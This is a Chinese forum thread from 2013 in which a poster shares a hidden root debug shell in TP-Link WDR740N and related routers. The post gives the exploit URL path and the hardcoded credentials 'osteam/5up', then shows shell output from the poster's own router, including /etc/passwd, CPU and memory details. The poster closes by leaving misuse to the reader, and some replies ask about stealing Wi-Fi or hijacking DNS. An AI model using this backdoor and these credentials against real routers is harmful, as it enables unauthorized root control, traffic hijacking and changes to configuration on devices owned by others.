找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 179|回复: 35

【干货】TP

[复制链接]

413

主题

6666

回帖

1万

积分

论坛元老

积分
14611
发表于 2013-5-26 19:24:48 | 显示全部楼层 |阅读模式
本帖最后由 过客 于 2013-5-26 19:26 编辑

TP-Link  WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。

固件版本:3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam  Password: 5up

使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。

==============以上是废话==============

过客的路由器是:TP-Link TL-WR941N
软件版本:3.11.7 Build 100723 Rel.46142n
硬件版本:WR941N v4/v5 00000000

开始测试:[ol]
  • cat /proc/cpuinfo&
  • 827
  • # system type                : Atheros AR7240 (Python)
  • processor                : 0
  • cpu model                : MIPS 24K V7.4
  • BogoMIPS                : 265.21
  • wait instruction        : yes
  • microsecond timers        : yes
  • tlb_entries                : 16
  • extra interrupt vector        : yes
  • hardware watchpoint        : yes
  • ASEs implemented        : mips16
  • VCED exceptions                : not available
  • VCEI exceptions                : not available
  • cat /etc/passwd&
  • 828
  • # root:x:0:0:root:/root:/bin/sh
  • Admin:x:0:0:root:/root:/bin/sh
  • bin:x:1:1:bin:/bin:/bin/sh
  • daemon:x:2:2:daemon:/usr/sbin:/bin/sh
  • adm:x:3:4:adm:/adm:/bin/sh
  • lp:x:4:7:lp:/var/spool/lpd:/bin/sh
  • sync:x:5:0:sync:/bin:/bin/sync
  • shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
  • halt:x:7:0:halt:/sbin:/sbin/halt
  • uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
  • operator:x:11:0:Operator:/var:/bin/sh
  • nobody:x:65534:65534:nobody:/home:/bin/sh
  • ap71:x:500:0:Linux User,,,:/root:/bin/sh
  • cat /proc/meminfo&
  • 843
  • # MemTotal:        30676 kB
  • MemFree:         12876 kB
  • Buffers:          1836 kB
  • Cached:           6056 kB
  • SwapCached:          0 kB
  • Active:           6116 kB
  • Inactive:         3892 kB
  • HighTotal:           0 kB
  • HighFree:            0 kB
  • LowTotal:        30676 kB
  • LowFree:         12876 kB
  • SwapTotal:           0 kB
  • SwapFree:            0 kB
  • Dirty:               0 kB
  • Writeback:           0 kB
  • Mapped:           4276 kB
  • Slab:             5436 kB
  • CommitLimit:     15336 kB
  • Committed_AS:     4324 kB
  • PageTables:        276 kB
  • VmallocTotal:  1048560 kB
  • VmallocUsed:      1944 kB
  • VmallocChunk:  1046464 kB
  • # ls /
  • bin      etc      linuxrc  proc     sbin     usr      web
  • dev      lib      mnt      root     tmp      var
  • # [/ol]复制代码至于利用这个东西能干啥……那就自己发挥吧,走了。



  • 本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×
    回复

    使用道具 举报

    52

    主题

    1806

    回帖

    3796

    积分

    论坛元老

    积分
    3796
    发表于 2013-5-26 19:25:22 | 显示全部楼层
    额,好牛逼的样子
    回复

    使用道具 举报

    45

    主题

    1540

    回帖

    3233

    积分

    论坛元老

    积分
    3233
    发表于 2013-5-26 19:26:36 | 显示全部楼层
      我不懂
    回复

    使用道具 举报

    180

    主题

    1634

    回帖

    3816

    积分

    论坛元老

    积分
    3816
    发表于 2013-5-26 19:31:23 | 显示全部楼层
    哦。
    回复

    使用道具 举报

    5

    主题

    310

    回帖

    641

    积分

    高级会员

    积分
    641
    发表于 2013-5-26 19:34:32 | 显示全部楼层


    不错。。。
    回复

    使用道具 举报

    55

    主题

    1174

    回帖

    2521

    积分

    金牌会员

    积分
    2521
    发表于 2013-5-26 19:35:18 | 显示全部楼层
    谢谢分享
    回复

    使用道具 举报

    240

    主题

    2693

    回帖

    6164

    积分

    论坛元老

    积分
    6164
    发表于 2013-5-26 19:38:52 | 显示全部楼层
    不懂,能蹭网不
    回复

    使用道具 举报

    1

    主题

    80

    回帖

    169

    积分

    注册会员

    积分
    169
    发表于 2013-5-26 19:41:26 | 显示全部楼层
    不懂。。可以劫持DNS吗?
    回复

    使用道具 举报

    661

    主题

    5642

    回帖

    1万

    积分

    论坛元老

    积分
    13313
    发表于 2013-5-26 19:51:38 | 显示全部楼层
    不错啊分享
    回复

    使用道具 举报

    0

    主题

    1

    回帖

    4

    积分

    新手上路

    积分
    4
    发表于 2013-5-26 20:02:23 | 显示全部楼层
    学习了

    80端口被封,还是好事
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋|Discuz! X

    GMT+8, 2025-1-15 13:27 , Processed in 0.019185 second(s), 3 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表